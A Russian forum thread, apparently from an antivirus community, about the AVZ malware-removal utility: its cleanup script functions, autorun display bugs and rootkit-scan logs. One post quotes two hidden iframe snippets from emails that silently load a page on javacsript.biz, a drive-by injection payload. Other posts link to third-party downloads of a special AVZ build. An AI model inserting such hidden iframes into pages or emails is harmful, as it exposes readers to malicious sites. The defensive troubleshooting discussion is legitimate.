AVZ 4.30

[QUOTE=Nick222;400759]Прошу прощения за дурацкий вопрос, но на нескольких компах на работе явный троян или что-то подобное: в System32 бесконтрольно размножаются файлы типа 21(любое число).scr.
Avast и ClamWin постоянно что-то находят - каждый своё - и якобы удаляют, но реально ничего не меняется.
AVZ либо ничего особого не говорит при проверке дисков - либо подвешивается с концами (если включать драйвера расширенного мониторинга процессов и гард).
Где бы прочитать инструкцию - как грамотно провести исследование системы в такой ситуации (маловероятно, что какая-то иная утилита покажет что-то вразумительное - если AVZ не говорит - или я неправ?)?
Если это новый зловред, атакующий MBR (см.выше), то AVZ должен его детектить или пока ещё он определяется только по косвенным признакам?
Спасибо :)[/QUOTE]
похожее недавно было, по Ноду это IRCBot
у меня в system были либо services.exe или 1sass.exe (в зависимости от модификации зверя) также имелся процесс с таким именем,
а в system32/drivers был sysdrv32.sys он же имелся в реестре в нескольких местах (через поиск можно посмотреть по памяти непомню)
также куча файлов вида ХХ.scr (две цифры)
зараженные машины имели большое количество соединений по 445 порту, машины Win2003 через 10 минут работы наглухо висли, помогло отключение нэтбиоса,
зверя высылал в нод, и после обновления баз он его на подлете стал прибивать.

Похоже, что это то самое...
У меня стоит Avast, я им послал несколько образцов - но само ядро зловреда никак не выявлю - и он никак не блокируется.
Разве AVZ в данном случае не поможет?

[QUOTE=Nick222;401390]
Разве AVZ в данном случае не поможет?[/QUOTE]
Скорее сего, что поможет, если Вы выполните [URL="http://virusinfo.info/showthread.php?t=1235"]Правила[/URL].

День добрый. Странная штука отображается в менеджере автозапуска в AVZ. Может это ошибка в реестре или в алгоритме самого AVZ по разбиению на строки.

Что у меня в реестре (кавычки я сам дописал):
[CODE]"AppInit_DLLs" =
"D:\PROGRA~1\Kaspersky Lab\Kaspersky Anti-Virus 2009\mzvkbd.dll,D:\PROGRA~1\Kaspersky Lab\Kaspersky Anti-Virus 2009\mzvkbd3.dll"[/CODE]
Что даёт AVZ:
[IMG]http://img196.imageshack.us/img196/6893/29906238.png[/IMG]

[IMG]http://img195.imageshack.us/img195/4300/41067823.png[/IMG]

Это болезнь такая есть у AVZ: не любит пробелы в именах файлов.

Соответственно в логах тоже огрызки получаются. :( Надо переписать разбивку параметров. ;)

[size="1"][color="#666686"][B][I]Добавлено через 6 минут[/I][/B][/color][/size]

Есть ещё один вопрос, если запускать AVZ со скриптом, например:
[CODE]begin
// Сканирование
ExecuteStdScr(2);
end.[/CODE]
Будут ли в результатах упомянут отчёт мастера поиска проблем? Если нет, как это туда добавить? :)

Возможно, этот вопрос уже 100 раз обсуждался, но в поиске я ничего не нашёл. Я про совместимость AVZ 4.30 с 64-битными операционными системами (XP, Vista). К примеру, тот же драйвер расширенного мониторинга процессов (AVZPM) на 64-битной ОС не загружается. Будет ли добавлена полная поддержка 64-битных ОС в AVZ и как скоро это планируется сделать?

[QUOTE=Kuzz;392265]Сегодня и Symantec начал его детектировать..[/QUOTE]

Вот [URL="https://submit.symantec.com/false_positive/index.html"]форма[/URL] сообщения о ложном срабатывании. Добавили в течении суток.

не совсем по теме, но про AVZ

AVZ 4.32 (полиморфный/специальный), очень много файлов не прошедших проверку по базе безопасных, с чем связано? будут ли изменения?
просто теряешься в этой куче файлов в автозагрузке, притом этих файлов еще и физически нет на винте, такие как mssip1 mssip2 mssip3 и т.д...
с удивлением обнаружил у себя в логе в автозагрузке[CODE]C:\Documents and Settings\Администратор\Local Settings\Temp\{7229C903-67DE-4463-9DEA-6B6B2651BC75}\fsgk.sys
HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\F-Secure Gatekeeper, EventMessageFile[/CODE]
хотя F-Secure не устанавливал и кучу всяких *.fon...

[QUOTE=Serrrgio;408386]не совсем по теме, но про AVZ

AVZ 4.32 (полиморфный/специальный), очень много файлов не прошедших проверку по базе безопасных, с чем связано? будут ли изменения?
просто теряешься в этой куче файлов в автозагрузке, притом этих файлов еще и физически нет на винте, такие как mssip1 mssip2 mssip3 и т.д...
с удивлением обнаружил у себя в логе в автозагрузке[CODE]C:\Documents and Settings\Администратор\Local Settings\Temp\{7229C903-67DE-4463-9DEA-6B6B2651BC75}\fsgk.sys
HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\F-Secure Gatekeeper, EventMessageFile[/CODE]
хотя F-Secure не устанавливал и кучу всяких *.fon...[/QUOTE]
Полиморфная версия нужна не для использования, а для особых случаев лечения (когда зловреды узнают AVZ и борятся с ним). В остальном если он что-то показывает, то это означает, что оно есть ... почему показываем много всего ? А потому, что полиморфная версия строится на базе релиза-кандидата новой воерсии AVZ, и там значительно больше проверок в области экзотического автозапуска

Вопрос по вот этой функции:
function DelAutorunByFileName(AKeyName : string)

Что она удаляет и как ее использовать?

Плюс еще один:
Если используем DeleteService('trojan',true), то попадет ли файл в задание для
ВС_ImportDelete и в задание для ExecuteSysclean

Присоединяюсь к Павлу, но хотелось бы ещё расширить вопрос.
Если я правильно понимаю, удаление вирусов и их следов делится на два типа: удаление файлов с диска и удаление в реестре ссылок на файл. Всё. Третьего не дано. Файлы и реестр.
С удалением файлов всё ясно - каждый удаляемый файл указывается непосредственно (или используется маска).
Если мы удаляем файл, его имя передаётся функции ExecuteSysClean и она удаляет все следы в реестре. Таким образом все проявления вируса удалены.
Если же удаления файла не производится, то указываем имя файла, следы которого надо очистить, с помощью функции SysCleanAddFile. И в реестре чистятся все следы.

Получается, что функции удаления файла и функции чистки реестра достаточно, чтобы полностью удалить все проявления вируса.
Зачем тогда нужны функции: DelWinlogonNotifyByFileName, DelAutorunByFileName, DeleteService и т.д.?

Дополнительно также хочу добавить (из общения с Павлом в ПМ): где пропишется и как будет обработана функция автозапуска из win.ini? Этот автозапуск [URL="http://www.fortunecity.com/skyscraper/windows/364/rnwinini.html"]давно известен[/URL], лично с ним сталкивался в одном бэкдоре, который, кстати, больше нигде свой сервер не прописывал.
Вообще - довольно странно, что в разделе "Автозагрузка" логов указывается только запуск из веток реестра, а про банально папку "Автозагрузка" и тот же win.ini забыли...

[QUOTE=gjf;408479]Дополнительно также хочу добавить (из общения с Павлом в ПМ): где пропишется и как будет обработана функция автозапуска из win.ini? Этот автозапуск [URL="http://www.fortunecity.com/skyscraper/windows/364/rnwinini.html"]давно известен[/URL], лично с ним сталкивался в одном бэкдоре, который, кстати, больше нигде свой сервер не прописывал.
Вообще - довольно странно, что в разделе "Автозагрузка" логов указывается только запуск из веток реестра, а про банально папку "Автозагрузка" и тот же win.ini забыли...[/QUOTE]
Довольно странно - это все есть в AVZ много лет как ... Менеджер автозапуска, "Автозапуск\Реестр\INI файлы" - там находятся элементы атвозапуска, найденные в win.ini и system.ini. Раздел "Автозапуск\Папки автозапуска" показывает папку автозапуска

[size="1"][color="#666686"][B][I]Добавлено через 7 минут[/I][/B][/color][/size]

[QUOTE=surok;408473]Присоединяюсь к Павлу, но хотелось бы ещё расширить вопрос.
Если я правильно понимаю, удаление вирусов и их следов делится на два типа: удаление файлов с диска и удаление в реестре ссылок на файл. Всё. Третьего не дано. Файлы и реестр.
С удалением файлов всё ясно - каждый удаляемый файл указывается непосредственно (или используется маска).
Если мы удаляем файл, его имя передаётся функции ExecuteSysClean и она удаляет все следы в реестре. Таким образом все проявления вируса удалены.
Если же удаления файла не производится, то указываем имя файла, следы которого надо очистить, с помощью функции SysCleanAddFile. И в реестре чистятся все следы.

Получается, что функции удаления файла и функции чистки реестра достаточно, чтобы полностью удалить все проявления вируса.
Зачем тогда нужны функции: DelWinlogonNotifyByFileName,
DelAutorunByFileName, DeleteService и т.д.?[/QUOTE]
DelWinlogonNotifyByFileName, DelAutorunByFileName, DeleteService и т.п. - они крайне полезны для сложных скриптов. Например, есть необходимость удалить элемент автозапуска, не трогая исполняемый файл ... или удалить конкретную службу и ничего более. Подобные функции позволяют выполнять "прицельное" удаление, не вызывая глобальной чистки, которая происходит при SysClean (там чистится автозапуск, службы и драйвера, CLSID с всеми сопуствующими хвостами и т.п.). Еще одно применение - известно только имя файла, без пути - рисковано добавлять его в глобальную чистку, особенно если известно, что это например служба или драйвер. В этом случае SysClean ведет себя осторожно, трактуя сомнения в пользу удаляемого файла, тогда как "прицельные" функции - наоборот.

С удалением файлов не все получается ясно - команда удаления файла удаляет только файл с указанным именем (одну штуку), маски там не поддержиаются. Для удаления файлов по маске есть особая отдельная функция удаления по маске

[size="1"][color="#666686"][B][I]Добавлено через 3 минуты[/I][/B][/color][/size]

[QUOTE=PavelA;408399]Вопрос по вот этой функции:
function DelAutorunByFileName(AKeyName : string)

Что она удаляет и как ее использовать?

Плюс еще один:
Если используем DeleteService('trojan',true), то попадет ли файл в задание для
ВС_ImportDelete и в задание для ExecuteSysclean[/QUOTE]
DelAutorunByFileName удаляет эмемент автозапуска по известному имени файла
DeleteService заносит удаленный файл в список удаленных для чистки
Оба ответа актуальны для пре-релиза, что-то там правилось как раз в этой области

Спасибо, Олег! Вероятно за счёт того, что "много лет как" - потому и не сталкивался: в пользовании AVZ я - новичок.
На [URL="http://virusinfo.info/showpost.php?p=408399&postcount=851"]самый первый вопрос Павла[/URL] небольшое уточнение - например, выполнит ли "своё дело" такой скрипт:
[CODE]...
DeleteService('SMSCGISVC',true);
DeleteService('Google Online Search Service',true);
DeleteService('CcEvtSvc',true);
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
...[/CODE]

[QUOTE=gjf;408500]Спасибо, Олег! Вероятно за счёт того, что "много лет как" - потому и не сталкивался: в пользовании AVZ я - новичок.
На [URL="http://virusinfo.info/showpost.php?p=408399&postcount=851"]самый первый вопрос Павла[/URL] небольшое уточнение - например, выполнит ли "своё дело" такой скрипт:
[CODE]...
DeleteService('SMSCGISVC',true);
DeleteService('Google Online Search Service',true);
DeleteService('CcEvtSvc',true);
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
...[/CODE][/QUOTE]
Сейчас (на полиморфной версии в частности) такое сработает с гарантией. На публичной версии я на 100% не уверен, это можно попробовать :)

[QUOTE=Зайцев Олег;408489]Подобные функции позволяют выполнять "прицельное" удаление, не вызывая глобальной чистки, которая происходит при SysClean.[/QUOTE]
То есть если мы хотим убрать все следы, достаточно [U]только[/U] ExecuteSysClean?

[QUOTE=surok;408588]То есть если мы хотим убрать все следы, достаточно [U]только[/U] ExecuteSysClean?[/QUOTE]
Да, как правило достаточно. Так как там выполняются все основные чистки (CLSID и все, что за ними тянется - в частности BHO и расширения IE; автозапуск; службы и драйвера; Winlogon; LSP; плюс доп. расширенные процедуры зачистки из обновляемой базы)

Я плохо представляю, что такое CLSID, но мне казалось, что оно не замыкается только на один файл и поэтому если чистка реестра производится по одному конкретному файлу, весь CLSID не удаляется. Это так?
Или при чистке реестра функцией ExecuteSysClean удаляется весь CLSID в котором был зарегистрирован этот файл и DelCLSID уже не нужна?

Добрый день
Не знаю, может где-нибудь и пробегала уже такая мысль.
У DrWeb (на прімере CureIt), gmer есть такая интересная штука при скачивании, как произвольное имя
программы. Что сделано для затруднения блокировки работы по имени.

Можно ли такое реализовать и для AVZ?

Есть и у нас такое.

[QUOTE=surok;408639]
Или при чистке реестра функцией ExecuteSysClean удаляется весь CLSID в котором был зарегистрирован этот файл и DelCLSID уже не нужна?[/QUOTE]
имхо, не надо полностью полагаться на ExecuteSysClean, практика показывает, что для AVZ 4.30 DelCLSID применять надо.

[QUOTE=Pili;408815]практика показывает, что для AVZ 4.30 DelCLSID применять надо.[/QUOTE]
И для AVZ 4.32 тоже... ;)

[QUOTE]AVZ 4.30 DelCLSID применять надо. [/QUOTE]
С этим согласен.

А вот DelBHO я так и не понял, работает ли вообще? :) В логе тыкаешь на это, а бесполезно ))
Всё равно приходится в Хиджаке фиксить.

[QUOTE=light59;408852]А вот DelBHO я так и не понял, работает ли вообще?[/QUOTE]
Вообще работает )
DelBHO, как я понял, удаляет только из
[CODE]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\[/CODE]
И не удаляет из
[CODE]HKEY_CLASSES_ROOT\CLSID\[/CODE]
Хотя очень часто, то что прописано в ВНО, находится и CLSID, например от MyCenria есть в
[CODE]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86}[/CODE]
и в [CODE]HKEY_CLASSES_ROOT\CLSID\{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86}[/CODE]
Однако по логам AVZ предлагает только
[CODE] DelBHO('{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86}');[/CODE]

А ExecuteRepair(1) восстанавливает ассоциации scr-файлов?

[QUOTE=gjf;409025]А ExecuteRepair(1) восстанавливает ассоциации scr-файлов?[/QUOTE]
Да

[size="1"][color="#666686"][B][I]Добавлено через 1 минуту[/I][/B][/color][/size]

[QUOTE=Pili;408872]Вообще работает )
DelBHO, как я понял, удаляет только из
[CODE]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\[/CODE]
[/QUOTE]
Именно так и есть. DelCLSID идет начиная от CLSID - прибивает его (класс в результате уже не загрузится) и зачищает ссылки на него в основных известных местах. В то время как DelBHO только удаляет BHO и ничего более не делает

[QUOTE=Aleksandra;408820]И для AVZ 4.32 тоже... [/QUOTE]
А что это за версия такая, можно поинтересоваться?? :?

[QUOTE=vistaorxpmoy;409235]А что это за версия такая, можно поинтересоваться?? :?[/QUOTE]
[url]http://rapidshare.com/files/231459517/special_avz.zip[/url] - полиморфный AVZ 4.32 от 05.05.2009.

А основная версия будет обновляться?
Будет ли она полиморфной?

Народ, а что, RSS-лента по теме не работает (ссылку нашёл, но тема пустая)?
Нельзя ли попросить админа её включить - а то с подпиской какие-то глюки в последнее время...?

Скачат архив AVZ4? распаковываю все ровно, начинаю устанавливать а он вообще ни какой реакции!

[QUOTE=Multur;409637]Скачат архив AVZ4? распаковываю все ровно, начинаю устанавливать а он вообще ни какой реакции![/QUOTE]
По какой ссылке скачиваешь архив ?
Программу не нужно устанавливать, после распаковки запускаешь файл "Avz.exe" - всё. Программа работает.

Антивирусный плагин AVZ для The Bat не реагирует на следующую вещь в HTML письмах - ни при получении письма, ни при принудительной проверке папок почтовых ящиков на вирусы (изнутри Бата):

[CODE]<iframe qhdik='gvSDpyE9' src='http://javacsript.biz/in/in.cgi?2 ' jstuj='9lPaDk9P' width='57' height='296' style='display:none'></iframe>[/CODE]

или

[CODE]<iframe cerob='l5hSVJLW' src='http://javacsript.biz/in/in.cgi?2 ' mbmko='imTSb040' width='0' height='0' style='display:none'></iframe>[/CODE]

Бат версия 4.1.11.2 RC2.

Так и должно быть?
И что с этим делать?

P.S.: Avast письма с этим кодом считает зловредными. :O

[QUOTE=Multur;409637]Скачат архив AVZ4? распаковываю все ровно, начинаю устанавливать а он вообще ни какой реакции![/QUOTE

Аналогичная проблема..Пытаюсь запустить avz.exe - ни какой реакции..
Архив взял сегодня здесь [url]http://z-oleg.com/avz4.zip[/url]
(Для справки - на моём компе стоит ос Windows XP Professional SP2)

:(

[B]Filippossi[/B], попробуйте этот AVZ: [url]http://narod.ru/disk/9487011000/avz-poly.exe.html[/url] (это более свежая версия AVZ, но в ней не обновляются базы).

Доктор, меня все игнорируют :(
Следующий! :)

Nick222, avz и не должен на это реагировать. Так что в этом плане всё нормально.
К тому же, в данном случае, просто ложное срабатывание avast. Нельзя ругаться на все iframe, есть и безвредные ведь ;)
P.s. Желательно, в почтовом клиенте запретить html ;) Только текст разрешить ;)

Здравствуйте!
Заранее извиняюсь, если не в ту тему.
Подскажите пожалуйста, что это значит, (особено маскировка процессов и драйверов):
Выполняется стандартный скрипт: 1. Поиск и нейтрализации RootKit UserMode и KernelMode
1.1 Поиск перехватчиков API, работающих в UserMode
Анализ kernel32.dll, таблица экспорта найдена в секции .text
Анализ ntdll.dll, таблица экспорта найдена в секции .text
Анализ user32.dll, таблица экспорта найдена в секции .text
Анализ advapi32.dll, таблица экспорта найдена в секции .text
Анализ ws2_32.dll, таблица экспорта найдена в секции .text
Анализ wininet.dll, таблица экспорта найдена в секции .text
Анализ rasapi32.dll, таблица экспорта найдена в секции .text
Анализ urlmon.dll, таблица экспорта найдена в секции .text
Анализ netapi32.dll, таблица экспорта найдена в секции .text
1.2 Поиск перехватчиков API, работающих в KernelMode
Драйвер успешно загружен
SDT найдена (RVA=137B00)
Ядро ntkrnlpa.exe обнаружено в памяти по адресу 81A34000
SDT = 81B6BB00
KiST = 81AEC8E0 (391)
Проверено функций: 391, перехвачено: 0, восстановлено: 0
1.3 Проверка IDT и SYSENTER
Анализ для процессора 1
Анализ для процессора 2
Проверка IDT и SYSENTER завершена
1.4 Поиск маскировки процессов и драйверов
Маскировка процесса с PID=476, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 476)
Маскировка процесса с PID=588, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 588)
Маскировка процесса с PID=652, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 652)
Маскировка процесса с PID=1116, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1116)
Маскировка процесса с PID=1764, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1764)
Маскировка процесса с PID=1928, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1928)
Маскировка процесса с PID=220, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 220)
Маскировка процесса с PID=348, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 348)
Маскировка процесса с PID=1720, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1720)
Маскировка процесса с PID=2052, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2052)
Маскировка процесса с PID=2084, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2084)
Маскировка процесса с PID=2536, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2536)
Маскировка процесса с PID=3104, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3104)
Маскировка процесса с PID=3740, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3740)
Маскировка процесса с PID=3864, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3864)
Маскировка процесса с PID=3340, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3340)
Маскировка процесса с PID=3356, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3356)
Маскировка процесса с PID=3456, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3456)
Маскировка процесса с PID=3532, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3532)
Маскировка процесса с PID=3716, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3716)
Маскировка процесса с PID=3888, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3888)
Маскировка процесса с PID=156, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 156)
Маскировка процесса с PID=3228, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3228)
Маскировка процесса с PID=2128, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2128)
Маскировка процесса с PID=1404, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1404)
Маскировка процесса с PID=1236, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1236)
Маскировка процесса с PID=1296, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1296)
Маскировка процесса с PID=312, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 312)
Маскировка процесса с PID=2856, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2856)
Маскировка процесса с PID=3104, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3104)
Маскировка процесса с PID=3968, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3968)
Маскировка процесса с PID=2180, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2180)
Маскировка процесса с PID=1672, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1672)
Маскировка процесса с PID=3432, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3432)
Маскировка процесса с PID=1236, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1236)
Маскировка процесса с PID=2148, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2148)
Маскировка процесса с PID=3732, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3732)
Маскировка процесса с PID=3416, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3416)
Поиск маскировки процессов и драйверов завершен
Драйвер успешно загружен
1.5 Проверка обработчиков IRP
Проверка завершена

Спасибо!!!!

Сервер или Виста? Для них это вполне нормально. Какие-то короткоживущие процессы, AVZ не успевает получить о них информацию.